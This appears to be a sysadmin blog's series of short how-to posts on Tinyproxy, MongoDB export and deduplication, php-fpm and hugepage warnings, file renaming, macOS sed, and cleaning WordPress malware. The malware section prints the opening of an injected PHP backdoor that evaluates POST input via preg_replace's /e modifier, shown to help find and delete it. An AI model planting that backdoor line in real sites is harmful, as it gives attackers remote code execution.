Install Tinyproxy on Centos 7

Tinyproxy is a light-weight HTTP/HTTPS proxy daemon for POSIX operating systems.
Designed from the ground up to be fast and yet small, it is an ideal solution for use cases such as embedded deployments where a full featured HTTP proxy is required, but the system resources for a larger proxy are unavailable.

[code lang=”shell”]
yum install -y epel-release
yum update -y
yum -y install tinyproxy
yum install vim -y
[/code]

vim /etc/tinyproxy/tinyproxy.conf

Search for
[code lang=”shell”]
Port 8888
[/code]

Then
Search for:
[code lang=”shell”]
Allow xxx.xxx.xxx.xxx
[/code]
If you want to let it connect from anywhere then just comment it, but I’m not recommended, because it will allow other user connect in.

To test from the Allowed server to the TinyProxy Server

ssh [email protected] -L 1234:localhost:8888 -N

[code lang=”shell”]
curl -I https://juzhax.com/ –proxy [email protected]:8888
[/code]

mongoexport and mongoimport with query from one host to one host

I would like to query the data that I need only from a server to another server, and I just use one line of command in linux shell

[code lang=”shell”]
mongoexport -h fromHost.com -d fromDB -c fromCollection -q ‘{ count: { $gte: 1 } }’ | mongoimport -h toHost.com -d toNewDB -c toNewCollection
[/code]

If your date is many GB, you can run it in background using nohup
[code lang=”shell”]
nohup "mongoexport -h fromHost.com -d fromDB -c fromCollection -q ‘{ count: { \$gte: 1 } }’ | mongoimport -h toHost.com -d toNewDB -c toNewCollection" &
[/code]

If you want to view the current process
[code lang=”shell”]
tail nohup.out -f
[/code]
It will output something like
[code lang=”shell”]
2016-05-17T02:34:47.822+0700 imported 1431218 documents
2016-05-17T02:36:40.240+0700 connected to: localhost
2016-05-17T02:36:40.243+0700 connected to: db.fromHost.com
2016-05-17T02:36:41.244+0700 db.collection 1000
2016-05-17T02:36:42.243+0700 db.collection 56000
2016-05-17T02:36:43.239+0700 db.collection0517 11.5 MB
2016-05-17T02:36:43.243+0700 db.collection 88000
2016-05-17T02:36:44.244+0700 db.collection 128000
2016-05-17T02:36:45.243+0700 db.collection 160000
2016-05-17T02:36:46.239+0700 db.collection0517 24.4 MB
…..
…..
[/code]

Fast way to find duplicate data in MongoDB

I need to find out the duplicate data content in my 40 Millions records, then I can make the unique index to my name field.

[code lang=”shell”]
> db.collecton.aggregate([
… { $group : {_id : "$field_name", total : { $sum : 1 } } },
… { $match : { total : { $gte : 2 } } },
… { $sort : {total : -1} },
… { $limit : 5 }],
… { allowDiskUse: true}
… );

{ "_id" : "data001", "total" : 2 }
{ "_id" : "data004231", "total" : 2 }
{ "_id" : "data00751", "total" : 2 }
{ "_id" : "data0021", "total" : 2 }
{ "_id" : "data001543", "total" : 2 }
>
[/code]

{ allowDiskUse: true} is optional if your data is not huge.

{ $limit : 5 }, you can set display more data.

ERROR: failed to ptrace(PEEKDATA) pid 17402: Input/output error (5)

You may found this error from your php-fpm and the php-fpm crash

[code lang=”shell”]
tail /var/log/php-fpm/error.log
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 17402: Input/output error (5)
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 17777: Input/output error (5)
[15-May-2016 12:24:13] ERROR: failed to ptrace(PEEKDATA) pid 18886: Input/output error (5)
[15-May-2016 12:25:53] ERROR: failed to ptrace(PEEKDATA) pid 17232: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 12091: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 16704: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 17779: Input/output error (5)
[15-May-2016 12:29:13] ERROR: failed to ptrace(PEEKDATA) pid 19015: Input/output error (5)
[15-May-2016 12:30:53] ERROR: failed to ptrace(PEEKDATA) pid 20663: Input/output error (5)
[15-May-2016 12:30:53] ERROR: failed to ptrace(PEEKDATA) pid 21002: Input/output error (5)
[/code]

Solution to stop ERROR: failed to ptrace(PEEKDATA)

You can just comment out the php-fpm config
[code lang=”shell”]
vim /etc/php-fpm.d/www.conf
[/code]

then comment out
[code lang=”shell”]
;slowlog = /var/log/php-fpm/slow.log
;request_slowlog_timeout = 5s
[/code]

WARNING: /sys/kernel/mm/transparent_hugepage/enabled is ‘always’.

After I install MongoDB 3.2.3 in Centos 7, I received this error when I start mongo in shell.

[code lang=”shell”]
[[email protected] ~]# mongo
MongoDB shell version: 3.2.3
connecting to: test
Server has startup warnings:
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is ‘always’.
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** We suggest setting it to ‘never’
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/defrag is ‘always’.
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** We suggest setting it to ‘never’
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten]
2016-02-29T14:11:49.308-0500 I CONTROL [initandlisten] ** WARNING: soft rlimits too low. rlimits set to 4096 processes, 64000 files. Number of processes should be at least 32000 : 0.5 times number of files.
[/code]

Solution

Create the init.d script.
Create the following file at /etc/init.d/disable-transparent-hugepages:

[code lang=”shell”]
#!/bin/sh
### BEGIN INIT INFO
# Provides: disable-transparent-hugepages
# Required-Start: $local_fs
# Required-Stop:
# X-Start-Before: mongod mongodb-mms-automation-agent
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Disable Linux transparent huge pages
# Description: Disable Linux transparent huge pages, to improve
# database performance.
### END INIT INFO

case $1 in
start)
if [ -d /sys/kernel/mm/transparent_hugepage ]; then
thp_path=/sys/kernel/mm/transparent_hugepage
elif [ -d /sys/kernel/mm/redhat_transparent_hugepage ]; then
thp_path=/sys/kernel/mm/redhat_transparent_hugepage
else
return 0
fi

echo ‘never’ > ${thp_path}/enabled
echo ‘never’ > ${thp_path}/defrag

unset thp_path
;;
esac
[/code]

Make it executable.
Run the following command to ensure that the init script can be used:

[code lang=”shell”]
sudo chmod 755 /etc/init.d/disable-transparent-hugepages
[/code]

[code lang=”shell”]
sudo chkconfig –add disable-transparent-hugepages
[/code]

WARNING: Cannot detect if NUMA interleaving is enabled. Failed to probe “/sys/devices/system/node/node1”: Permission denied

[code lang=”shell”]
[[email protected] ~]# mongo
MongoDB shell version: 3.2.3
connecting to: test
Server has startup warnings:
2016-02-29T23:11:36.666+0700 I CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten] ** WARNING: Cannot detect if NUMA interleaving is enabled. Failed to probe "/sys/devices/system/node/node1": Permission denied
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten] Failed to probe "/sys/kernel/mm/transparent_hugepage": Permission denied
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 W CONTROL [initandlisten] Failed to probe "/sys/kernel/mm/transparent_hugepage": Permission denied
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten]
2016-02-29T23:11:36.667+0700 I CONTROL [initandlisten] ** WARNING: soft rlimits too low. rlimits set to 4096 processes, 262144 files. Number of processes should be at least 131072 : 0.5 times number of files.
[/code]

Solution

I’m using the OVH kernel, so it is impossible to use with MongoDB, to solve this issue I have to install back the original kernel of the linux, then this error will be gone.

Remove WordPress Malware using Linux Shell Console

I’ve a lot of wordpress sites, recently few of my old sites infected malware, and those spammer using few of my sites to spam email. I would like to share the way I fix this.

Most of the spammer look for the 777 path, most properly in /wp-content/uploads/
So I try to scan all the php files that they upload there with date.
[code lang=”shell”]
find ./public_html/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort
[/code]

Then I found these
[code lang=”shell”]
2015-10-16 12:25:01 ./wp-content/uploads/2013/05/blog84.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/10/dump.php
2015-10-16 12:25:01 ./wp-content/uploads/2014/code.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/07/session90.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/09/xml96.php
2015-10-16 12:25:01 ./wp-content/uploads/2015/504.php
2015-10-16 12:25:01 ./wp-content/uploads/about_us.php
2015-10-16 12:25:01 ./wp-content/uploads/contactus.php
2015-10-16 12:25:01 ./wp-content/uploads/rtbwvcsxrnbsvcd.php
2015-10-16 12:25:01 ./wp-content/uploads/sc_afsed.php
2015-10-16 12:25:01 ./wp-content/uploads/team.php
2015-10-16 12:25:01 ./wp-content/uploads/wp-upload.php
[/code]

This Kind of files should be remove and they will spam.
You can view the file header to see is it spam or not.
[code lang=”shell”]
head ./wp-content/uploads/2013/05/blog84.php
[/code]
It will show something like this
[code lang=”shell”]
<?php @preg_replace(‘/(.*)/e’, @$_POST[‘dnrdztvetxn’], ”);
$GLOBALS[‘af4569’] = "\x40\x46\x33\x2e\x62\x7a\x6e\x4c\xa\x7e\x28\x39\x59\x71\x54\x5f\x73\x65\x3f\x77\x5d\x29\x6c\x2f\x79\x50\x56\x63\x5c\x4f\x3c\x70\x2d\x34\x24\x4d\x4a\x53\x57\x67\x44\x51\x23\x43\x7d\x64\x2b\x72\x5
[/code]
You should remove it immediately.

Search Malware files in WordPress

If you are server admin, you would like to scan all the users, you can try this
[code lang=”shell”]
find /home/*/domains/*/public_html/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort
[/code]
or
[code lang=”shell”]
find /home/nginx/domains/*/public/wp-content/uploads/ -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort
[/code]

The best way to find out all possible files, I suggest you upgrade the WordPress to latest version
Then try
[code lang=”shell”]
find ./public_html -type f -name ‘*.php’ -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort
[/code]
This will sort all the date of php file with modified date, you can find it out and remove them easily.

Fastest way to rename filenames with space to dash in linux

I want to mass rename hundred of filenames like
filename 001.jpg to filename-001.jpg



filename 099.jpg to filename-099.jpg

I use this command to rename all in few seconds in my MacBook Pro.
I think it is fine to run in any linux.
[code lang=”bash”]
for f in *\ *; do mv "$f" "${f// /-}"; done
[/code]

command c expects followed by text error in Mac

You received error from the sed command in Mac, because the argument in mac is different.
If you type in Mac terminal, you may receive error like this
[code lang=”bash”]
Justins-MacBook-Pro:2 juzhax$ sed -i ‘s/old_text/new_text/g’ example.txt
sed: 1: "config.php": command c expects \ followed by text
[/code]

The first argument should be the extension of the backup file. The correct way is
[code lang=”bash”]
Justins-MacBook-Pro:2 juzhax$ sed -i ‘.bak’ ‘s/old_text/new_text/g’ example.txt
[/code]

or

[code lang=”bash”]
Justins-MacBook-Pro:2 juzhax$ sed -i ‘.original’ ‘s/old_text/new_text/g’ example.txt
[/code]

If you don’t want any backup file, you can do like this.
[code lang=”bash”]
Justins-MacBook-Pro:2 juzhax$ sed -i ” ‘s/old_text/new_text/g’ example.txt
[/code]